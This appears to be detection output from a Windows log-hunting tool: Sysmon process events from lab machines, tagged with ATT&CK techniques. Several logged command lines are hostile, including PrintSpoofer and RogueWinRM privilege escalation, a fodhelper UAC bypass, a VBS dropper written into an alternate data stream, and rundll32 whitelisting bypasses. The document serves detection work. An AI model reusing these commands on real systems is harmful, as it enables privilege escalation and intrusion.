cmd /c rundll32 AllTheThings.dll,EntryPoint
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1088] Bypass User Account Control - Process,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5277
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 10:14:08.401
747F3D96-5E70-5D45-0000-0010FCDD9D00
3656
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-5E6F-5D45-0000-001014CA9D00
8180
C:\Windows\System32\fodhelper.exe
"C:\Windows\system32\fodhelper.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1561018068.92556,2019-06-20T12:07:48.925560+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1,"
1
5
4
1
0
0x8000000000000000
8116
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-06-20 08:07:48.909
365ABB72-3ED4-5D0B-0000-0010B2871A00
1440
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"cmd"
c:\ProgramData\
IEWIN7\IEUser
365ABB72-3991-5D0B-0000-002029350100
0x13529
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-3D05-5D0B-0000-001004220D00
816
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564827248.681363,2019-08-03T14:14:08.681363+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5277
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 10:14:08.401
747F3D96-5E70-5D45-0000-0010FCDD9D00
3656
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-5E6F-5D45-0000-001014CA9D00
8180
C:\Windows\System32\fodhelper.exe
"C:\Windows\system32\fodhelper.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556610375.246489,2019-04-30T11:46:15.246489+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c echo msdhch > \\.\pipe\msdhch ),1,"
1
5
4
1
0
0x8000000000000000
8575
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 07:46:15.183
365ABB72-FD47-5CC7-0000-00106AF61D00
4088
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c echo msdhch > \\.\pipe\msdhch
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-F6A1-5CC7-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-F6A1-5CC7-0000-001004550000
468
C:\Windows\System32\services.exe
C:\Windows\system32\services.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include (powershell, -c , -i ,powershell) in event with Command Line (powershell.exe) and Parent Image :C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe , Parent CommandLine (PrintSpoofer.exe -i -c powershell.exe) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
110434
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-02 18:01:54.866
747F3D96-B592-5EAD-0000-0010D4CDC200
1428
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
PowerShell.EXE
powershell.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-6ABB-5EAD-0000-0020E7030000
0x3e7
0
System
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-B592-5EAD-0000-0010ECCBC200
6760
C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe
PrintSpoofer.exe -i -c powershell.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1588442517.418442,2020-05-02T22:01:57.418442+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe ),1,"
1
5
4
1
0
0x8000000000000000
110434
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-02 18:01:54.866
747F3D96-B592-5EAD-0000-0010D4CDC200
1428
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
PowerShell.EXE
powershell.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-6ABB-5EAD-0000-0020E7030000
0x3e7
0
System
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-B592-5EAD-0000-0010ECCBC200
6760
C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe
PrintSpoofer.exe -i -c powershell.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"
1
5
4
1
0
0x8000000000000000
348
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:48:45.193
747F3D96-292D-5E1E-0000-0010F5597D00
3828
C:\Windows\explorer.exe
10.0.17763.348 (WinBuild.160101.0800)
Windows Explorer
Microsoft® Windows® Operating System
Microsoft Corporation
EXPLORER.EXE
explorer ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-292D-5E1E-0000-0020CD587D00
0x7d58cd
0
High
SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959
747F3D96-2910-5E1E-0000-0010F5F07C00
4612
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034925.293727,2020-01-15T00:48:45.293727+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\explorer.exe ) through command line ( explorer ms-browser:// ),1,"
1
5
4
1
0
0x8000000000000000
348
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:48:45.193
747F3D96-292D-5E1E-0000-0010F5597D00
3828
C:\Windows\explorer.exe
10.0.17763.348 (WinBuild.160101.0800)
Windows Explorer
Microsoft® Windows® Operating System
Microsoft Corporation
EXPLORER.EXE
explorer ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-292D-5E1E-0000-0020CD587D00
0x7d58cd
0
High
SHA1=3EB9D6F8F4448CB1FD6478189EDEBE3D70477EA7,MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959
747F3D96-2910-5E1E-0000-0010F5F07C00
4612
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
2164892
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2020-10-05 20:43:58.450
00247C92-858E-5F7B-0000-0010E741202B
6636
C:\Windows\System32\cmd.exe
10.0.18362.449 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe
C:\windows\
LAPTOP-JU4M3I0E\bouss
00247C92-8C36-5F75-0000-002034E39103
0x391e334
2
High
SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
00247C92-858E-5F7B-0000-00105241202B
18404
C:\Windows\System32\Taskmgr.exe
C:\windows\system32\taskmgr.exe
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237564.075706,2020-08-12T17:06:04.075706+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
342414
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:06:03.484
747F3D96-E93B-5F33-0000-0010C1B40E00
7888
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
C:\Windows\system32\cmd.exe /c schtasks /run /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" > nul 2>&1
C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\
MSEDGEWIN10\IEUser
747F3D96-E911-5F33-0000-0020241C0400
0x41c24
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E938-5F33-0000-00109CA00E00
7820
C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe
WerTrigger.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1584766854.689567,2020-03-21T09:00:54.689567+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
243570
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:45.082
747F3D96-9F7D-5E75-0000-00104E062100
2484
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami.exe
whoami
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-9F77-5E75-0000-001090F32000
2416
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1590282830.330775,2020-05-24T05:13:50.330775+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
196371
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-24 01:13:50.301
747F3D96-CA4E-5EC9-0000-00109FE23700
1516
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
c:\Windows\System32\cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-BDD1-5EC9-0000-0020E7030000
0x3e7
1
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-CA4B-5EC9-0000-0010B8CB3700
3960
C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe
RogueWinRM.exe -p c:\Windows\System32\cmd.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1561018068.909935,2019-06-20T12:07:48.909935+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1,"
1
5
4
1
0
0x8000000000000000
8114
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-06-20 08:07:48.894
365ABB72-3ED4-5D0B-0000-00106C871A00
888
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"cmd"
c:\ProgramData\
IEWIN7\IEUser
365ABB72-3991-5D0B-0000-002029350100
0x13529
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-3D05-5D0B-0000-001004220D00
816
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237564.051227,2020-08-12T17:06:04.051227+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
342413
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:06:02.548
747F3D96-E93A-5F33-0000-001014B30E00
7868
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1
C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\
MSEDGEWIN10\IEUser
747F3D96-E911-5F33-0000-0020241C0400
0x41c24
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E938-5F33-0000-00109CA00E00
7820
C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe
WerTrigger.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557370343.500263,2019-05-09T06:52:23.500263+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" )",1,"
1
5
4
1
0
0x8000000000000000
11238
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-09 02:52:23.484
365ABB72-95E7-5CD3-0000-001046950F00
2812
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""
C:\Users\IEUser\AppData\Local\Temp\onedrive\
IEWIN7\IEUser
365ABB72-94CD-5CD3-0000-0020DD3A0100
0x13add
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-9570-5CD3-0000-00103FC90A00
1900
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948)",1,"
1
5
4
1
0
0x8000000000000000
423994
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:57:36.012
747F3D96-51D0-5F93-0000-001036A15B00
3396
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948
C:\Users\IEUser\AppData\Local\Temp\tmp1375\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002085A50800
0x8a585
1
High
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51CD-5F93-0000-001073735B00
7624
C:\Users\Public\test.tmp
c:\Users\Public\test.tmp
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1,"
1
5
4
1
0
0x8000000000000000
423994
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:57:36.012
747F3D96-51D0-5F93-0000-001036A15B00
3396
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948
C:\Users\IEUser\AppData\Local\Temp\tmp1375\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002085A50800
0x8a585
1
High
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51CD-5F93-0000-001073735B00
7624
C:\Users\Public\test.tmp
c:\Users\Public\test.tmp
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1,"
1
5
4
1
0
0x8000000000000000
423994
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:57:36.012
747F3D96-51D0-5F93-0000-001036A15B00
3396
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948
C:\Users\IEUser\AppData\Local\Temp\tmp1375\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002085A50800
0x8a585
1
High
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51CD-5F93-0000-001073735B00
7624
C:\Users\Public\test.tmp
c:\Users\Public\test.tmp
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1584766840.502366,2020-03-21T09:00:40.502366+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
243568
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:39.417
747F3D96-9F77-5E75-0000-001090F32000
2416
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-9F61-5E75-0000-0010686A1E00
4848
C:\Windows\System32\rundll32.exe
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237563.487498,2020-08-12T17:06:03.487498+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e )",1,"
1
5
4
1
0
0x8000000000000000
342412
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:06:01.636
747F3D96-E939-5F33-0000-0010ACAB0E00
7852
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e
C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\
MSEDGEWIN10\IEUser
747F3D96-E911-5F33-0000-0020241C0400
0x41c24
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E938-5F33-0000-00109CA00E00
7820
C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe
WerTrigger.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Detect IIS/Exchange Exploitation,1558885676.667118,2019-05-26T19:47:56.667118+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\notepad.exe) and commandline ( C:\Windows\System32\notepad.exe ),1,"
1
5
4
1
0
0x8000000000000000
5408
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-26 15:47:56.627
365ABB72-B52C-5CEA-0000-00107A0D1100
3388
C:\Windows\System32\notepad.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Notepad
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\System32\notepad.exe
c:\windows\system32\inetsrv\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3
365ABB72-B26B-5CEA-0000-0010582A0800
2744
C:\Windows\System32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034897.447948,2020-01-15T00:48:17.447948+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1,"
1
5
4
1
0
0x8000000000000000
345
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:48:17.270
747F3D96-2911-5E1E-0000-0010D80A7D00
2416
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"cmd.exe" /c notepad.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-2910-5E1E-0000-002082EF7C00
0x7cef82
0
High
